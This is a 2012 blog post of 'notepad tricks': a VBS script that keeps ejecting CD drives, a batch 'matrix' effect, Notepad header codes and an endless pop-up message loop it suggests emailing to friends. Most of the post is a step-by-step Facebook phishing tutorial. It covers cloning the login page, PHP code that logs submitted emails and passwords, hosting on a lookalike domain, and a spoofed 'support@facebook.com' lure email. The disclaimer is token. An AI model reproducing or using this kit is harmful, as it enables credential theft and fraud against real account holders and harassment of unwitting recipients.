Saturday, 15 December 2012

Some note pad tricks created by me


1. Continually pop the CD Drive

  • Open Notepad.
  • Copy the code given below onto the notepad file:
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
  • Save it as “Anything.VBS”.
Now open the file and see the magic! The file will continuously force the CD rom to pop out! And If you have more than one then it pops out all of them!

2. Matrix Effect

notepad tricks
Not much to explain, just follow the steps and see the amazing matrix effect happen in your DOS window:
  • Open Notepad.
  • Copy the below mentioned text in your notepad file:
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
  • Save the file with .bat extension like Matrix.bat
Thats it. Just open the file to see the matrix effect right before your eyes!

3. Change The Header/Footer Of Your Notepad File

More often than not whenever you get a printout of your notepad file, it starts with “Untitled” or the filename at top, and “Page ” on bottom. Now if you want to get rid of it or want to change it, just follow the simple steps given below.
notepad tricks
  • Open Notepad.
  •  Click on File -> Page Setup.
  • Replace the text written in the “Header” and “Footer” box (as shown above) by any of the following codes:
&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number

4. Constantly Repeat Messages

Using this notepad trick you can annoy anyone and can actually force them to log off or leave the computer (LOL….). This notepad trick will create an infinite cycle of a message in the computer. Follow the steps to know more:
  • Open Notepad.
  • Paste the following code in the notepad file:
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
  • Save the file with any file name but with .bat as extension and close it. For eg. Freakymessage.bat
After saving the file just open it (by double clicking) and see what happens.
Pssstttt……. You can piss of your friends by sending it as an email attachment asking them to try it out !

How to hack Facebook account password [PHISHING - Fake login] with upgraded code






**Please don't use Hacking tricks for illegal purposes. It is for educational purposes and for making fun only. Don't use this for hacking accounts of innocent guys. I will not take any responsibility for this.**
Just follow the steps below to hack facebook account via phishing. it is very simple and you don't need to bother about the codes. The old code had some bugs and so I have made this new code. Its another use is that this code can be used in any phishing pages; not only for Facebook, you can use for Google Plus, Gmail, Youtube and every pages that you want. Just follow the steps below.
First, Open your browser and go to www.facebook.com . You should not be signed in. If you already, sign out to get into the login page. Now Right click and select "View page source" or "view source". You can also do it by clicking "View" on the menu bar. Now you can see the source code of Facebook login page. Copy all the code and save it as a text file, named index.html. Open the file in notepad. Click cntrl+F and search for the word "action".
You can see something like
action="https://www.facebook.com/login.php?login_attempt=1"
replace it with action= “mail.php”

Now open notepad and write the following code in it.


<?php
header ('Location: http://www.facebook.com');
$file= fopen("log.txt", "a");
$email=$_POST["email"];
$pass=$_POST["pass"];


  fwrite($file, "Email = ");
  fwrite($file, $email);
  fwrite($file, "\r\n");


fwrite($file, "Password = ");
  fwrite($file, $pass);
  fwrite($file, "\r\n");
fwrite($file, "\r\n");
fclose($file);
exit;
?>

Why use updated code instead of old one? This is what everybody asks me. I will say the reason. If you have tested the old code, you may have noticed that the txt file consists of many unwanted and junk data like some large code numbers and alphabets in addition to email and password. by using this code you can avoid that. The basic layout of the txt file looks like this


Email = something@some.com
Password = something2123


Email = something2@some.com
Password = passsawwssd

and so on

For debuggers, I'm giving the old code. If you are a beginner just skip this step

Code:
<?php
header ('Location: https://www.facebook.com/login.php?login_attempt=1 ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Create  a new text file named log.txt for saving passwords.

Now you need a free hosting service for uploading this files. You can use any provides likehttp://000webhost.com. It would be better to use any name related to facebook.com like faecbook.com
Upload the three files into the root folder of your hosting.

Now you are almost done. The last part is to make the victim fall in your trap. Use a Email spoofing provider like http://www.hoaxmail.co.uk/ . Using this you can send Email from Address support@facebook.com to your victim.
Here is a sample of the Email. You can change it according to your need.

Sub: Invalid activity on your facebook account

Body:
Dear facebook user (victim's facebook user name),
Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,
<link to phished site>
Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.

support@facebook.com,
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394
US


If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in log.txt file. .

How to save yourself from Phishing attacks.
Don't reply  to the Emails that appear to come from Facebook and never click any link inside it. Always login to your account by typing www.facebook.com on the address bar.